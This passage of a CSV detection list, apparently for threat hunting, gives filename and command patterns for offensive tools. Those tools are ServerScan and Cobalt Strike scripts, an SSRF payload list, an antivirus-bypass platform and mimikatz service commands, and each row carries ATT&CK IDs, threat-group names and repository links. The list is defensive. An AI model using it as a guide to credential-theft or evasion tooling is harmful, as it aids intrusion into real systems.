- T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan.linux.so*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverScan.win.cna*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan_386.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Air_*.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Air_*_amd64*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Air_*_i386*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan_air-probes.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan_amd64.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*_amd64*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*_i386*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan64 *tcp*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan86 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*Server-Side-Request-Forgery-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*service/executable/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*service/executable/compile.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 